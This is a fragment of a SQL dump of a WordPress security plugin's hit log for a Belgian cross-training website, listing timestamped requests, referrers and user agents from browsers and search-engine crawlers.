(75072, 1497287081.350493, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75073, 1497287081.790301, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75074, 1497287082.240094, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75075, 1497287083.193366, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75076, 1497287083.929858, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75077, 1497287084.661508, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75078, 1497287085.117261, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75079, 1497287085.653507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75080, 1497287086.079181, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75081, 1497287086.517014, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75082, 1497288162.712339, 676177847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75083, 1497288823.681279, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75084, 1497288826.324153, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75085, 1497289915.899294, 1122253362, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/indax.php', 'http://crosstrainingcenter.be/indax.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75086, 1497291261.235767, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75087, 1497291261.710711, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75088, 1497291262.282269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75089, 1497291262.792529, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75090, 1497291263.289805, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75091, 1497291263.743115, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75092, 1497291264.240979, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75093, 1497291265.858713, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75094, 1497291266.538758, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75095, 1497291267.539247, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75096, 1497291268.047220, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75097, 1497291268.679159, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75098, 1497291269.547649, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75099, 1497291270.126040, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75100, 1497293414.395938, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75101, 1497293414.889212, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75102, 1497293415.371404, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75103, 1497293415.838226, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75104, 1497293416.403950, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75105, 1497293416.901394, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75106, 1497293417.384891, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75107, 1497293417.887810, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75108, 1497293418.362969, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75109, 1497293418.869124, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75110, 1497293419.344763, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75111, 1497293419.871954, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75112, 1497293420.335733, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75113, 1497293420.817682, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75114, 1497293817.704200, 2509959250, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(75115, 1497295637.808027, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75116, 1497295638.457173, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75117, 1497295638.956694, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75118, 1497295639.506520, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75119, 1497295640.033876, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75120, 1497295640.686356, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75121, 1497295641.496004, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75122, 1497295642.046428, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75123, 1497295642.572416, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75124, 1497295643.045680, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75125, 1497295643.525817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75126, 1497300330.492089, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75127, 1497300331.031366, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75128, 1497300331.476765, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75129, 1497300331.917611, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75130, 1497300332.400558, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75131, 1497300333.026857, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75132, 1497300333.489424, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75133, 1497300334.010538, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75134, 1497300334.441043, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75135, 1497300334.867568, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75136, 1497300335.278546, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75137, 1497300335.752546, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75138, 1497300336.188348, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75139, 1497300336.596313, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75140, 1497302192.115690, 676177710, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75141, 1497302203.660396, 2637637594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75142, 1497302631.567064, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75143, 1497305373.187974, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75144, 1497311670.092200, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75145, 1497312604.947880, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75146, 1497312605.942945, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75147, 1497313717.129767, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75148, 1497313717.129691, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75149, 1497313856.024054, 3024883614, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75150, 1497315020.238434, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75151, 1497317799.104303, 3652617279, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75152, 1497317818.214206, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75153, 1497323590.175001, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75154, 1497326292.071462, 2760155429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75155, 1497336803.542767, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75156, 1497341992.447184, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75157, 1497350931.448918, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75158, 1497358152.447314, 3024883602, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75159, 1497361888.358458, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75160, 1497361888.965055, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75161, 1497361889.503831, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75162, 1497361889.999347, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75163, 1497361890.476635, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75164, 1497361891.102861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75165, 1497361891.623974, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75166, 1497361892.080325, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75167, 1497361892.614234, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75168, 1497361893.088374, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75169, 1497361893.560340, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75170, 1497362539.107282, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75171, 1497362539.334029, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75172, 1497364361.356771, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjBn7P0hLvUAhWKIlAKHfzaCawQFggoMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=t7Xu36x676TsTBM1L3T9fw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75173, 1497364368.594383, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75174, 1497364369.071734, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75175, 1497364369.263727, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75176, 1497366371.789082, 676177710, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75177, 1497369406.897177, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75178, 1497369407.354288, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75179, 1497370300.430834, 3342489297, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75180, 1497370303.958500, 3342489297, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75181, 1497371828.024155, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75182, 1497381143.480984, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75183, 1497381144.047750, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75184, 1497381144.583525, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75185, 1497381145.050236, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75186, 1497381145.578613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75187, 1497381146.077776, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75188, 1497381146.707382, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75189, 1497381147.258253, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75190, 1497381147.845453, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75191, 1497381148.399051, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75192, 1497381148.897299, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75193, 1497387723.191445, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75194, 1497387723.734096, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75195, 1497387724.219953, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
